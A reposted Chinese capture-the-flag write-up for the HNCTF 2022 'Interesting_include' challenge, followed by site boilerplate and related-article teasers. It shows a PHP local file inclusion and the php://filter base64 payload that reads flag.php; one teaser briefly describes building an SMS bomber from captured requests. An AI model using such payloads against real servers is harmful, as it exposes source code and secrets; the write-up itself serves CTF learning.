NSSCTF [HNCTF 2022 Week1]Interesting_include

news/2024/11/18 17:51:41/文章来源:https://www.cnblogs.com/karasbai/p/18373936 
<?php
//WEB手要懂得搜索
//flag in ./flag.phpif(isset($_GET['filter'])){$file = $_GET['filter'];if(!preg_match("/flag/i", $file)){die("error");}include($file);
}else{highlight_file(__FILE__);
}

可以知晓,该段代码使用preg_match函数过滤掉了flag,绕过preg_match函数可以使用php://filter,通过对要读的文件进行base64加密来完成绕过

playload:/?filter=php://filter/read=convert.base64-encode/resource=flag.php

 得到一串base64加密的数据,放进bp进行解码,取得flag

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/785426.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

02-HTMLJS相关练习

02-HTMLJS相关练习

1、使用 html 写一个网页,要求满足以下条件: (1)网页中含有任意一张图片,图片路径使用绝对路径(这里绝对路径无法识别故使用相对路径),鼠标悬停在图片时出现“马哥教育”文本,且点击图片可跳转至马哥教育官方页面 (2)网页中包含账号、密码登录,且账号提前定义好是 …
阅读更多...
织梦dedecms判断文章是否为推荐文章

织梦dedecms判断文章是否为推荐文章

{dede:arclist row=10 typeid=typeid titlelen=36 runphp=yes} {dede:loop value=$dls}{if preg_match(/c/, $fields[flag])}<strong>推荐文章: </strong>{/if}<a href="[field:arcurl]" title="[field:title]">[field:title]</a>…
阅读更多...
织梦dedecms判断缩略图是否存在

织梦dedecms判断缩略图是否存在

{dede:field name=litpic runphp=yes} if(!empty(@me)) {<img src="@me" alt="缩略图" /> } else {<img src="/images/no-image.png" alt="默认图片" /> } [/dede:field]扫码添加技术【解决问题】专注中小企业网站建设、网…
阅读更多...
织梦dedecms判断子菜单是否存在

织梦dedecms判断子菜单是否存在

{dede:channeltype typeid=typeid runphp=yes} if(@list != ) {<ul class="submenu">{dede:loop value=@list}<li><a href="[url]">[@typename]</a></li>{/dede:loop}</ul> } else {"没有子菜单" } {/dede:…
阅读更多...
使用SiliconCloud快速体验SimpleRAG(手把手教程)

使用SiliconCloud快速体验SimpleRAG(手把手教程)

使用SiliconCloud快速体验SimpleRAG(手把手教程)SiliconCloud介绍 SiliconCloud 基于优秀的开源基础模型,提供高性价比的 GenAI 服务。 不同于多数大模型云服务平台只提供自家大模型 API,SiliconCloud上架了包括 Qwen、DeepSeek、GLM、Yi、Mistral、LLaMA 3、SDXL、Instant…
阅读更多...
axis参数讲解

axis参数讲解

axis在python使用中非常常见,比如numpy、pandas等使用情景。但是笔者几乎每次都会忘记axis = 0和axis = 1各自对应的是行还是列,最终决定写下笔记以防再次忘记。axis的作用:指明以行为单位进行处理数据,还是以列为单位处理数据。下图就已经很清晰地展示了axis = 0和axis = …
阅读更多...
电磁介质 知识梳理

电磁介质 知识梳理

新概念物理:电磁介质知识梳理1.电介质 \[\def\oiint{{\bigcirc}\kern-11.5pt{\int}\kern-6.5pt{\int}} \def\oiiint{{\bigcirc}\kern-12.3pt{\int}\kern-7pt{\int}\kern-7pt{\int}} \]1.1 极化的微观机制 在一类电介质中,当外电场不存在时,电介质分子的正负电荷中心是重合的…
阅读更多...
2024年关于短信轰炸机原理研究并实现的流程 (290021243

2024年关于短信轰炸机原理研究并实现的流程 (290021243

偶然看到gitHub上面有短信轰炸机源码,于是产生了研究的想法。 经过研究源码发现是通过抓包进行第三方网站抓包并且收集,最终进行post/get请求。携带header和token进行第三方网站模拟请求。 于是在mac上面下载了fiddler 进行代理配置 开放了本机ip下的8888商品,用手机同时访问…
阅读更多...
从企业管理到智慧城市:数据可视化大屏的多领域应用详解(AxureRP原型多行业案例演示)

从企业管理到智慧城市:数据可视化大屏的多领域应用详解(AxureRP原型多行业案例演示)

前言: 在现代商业环境中,广泛应用于政府、金融、互联网、制造业等多个领域,数据驱动决策已成为企业提升竞争力的关键要素之一。无论是智慧城市的管理中心,还是企业的数据中心,都能见到其身影。数据可视化大屏,作为一种高效直观的数据展示工具,能够将复杂的数据转化为易于…
阅读更多...
HuggingFace初体验

HuggingFace初体验

起因 StableDiffusion3的开源项目大致了解了一下项目的介绍,创新点之类的 在old environment基础上,配置了一下new environment(pip安装diffusers库、transformers库) 解决了一下torch和torchvision的版本冲突问题(询问chatGPT)HuggingFace下载需要登陆的模型官网注册,梯…
阅读更多...
Tarjan 之 割点 学习笔记

Tarjan 之 割点 学习笔记

首先,要求割点,我们需要知道割点是什么 割点: 是指在无向连通图中,如果删除某个顶点后,图的连通分量增加,则称该顶点为割点 好,知道了这个,那我们怎么去求他呢? Tarjan 大神给出了一种依然基于时间戳的算法 图片来源:董晓算法割点的求法大概就是这样的 所以细节还是见…
阅读更多...
暑假集训CSP提高模拟27

暑假集训CSP提高模拟27

暑假集训CSP提高模拟27 组题人: @KafuuChinocpp \(T1\) P236.线性只因 \(100pts\)诈骗题。部分分正解记 \(opt\) 表示待选集合,统计 \(opt\) 中这一位为 \(1\) 的数并加入临时集合 \(tmp\) 。若 \(tmp\) 大小 \(\ge m\) 则加上这一位的贡献并将 \(opt\) 赋成 \(tmp\) 否则不管…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023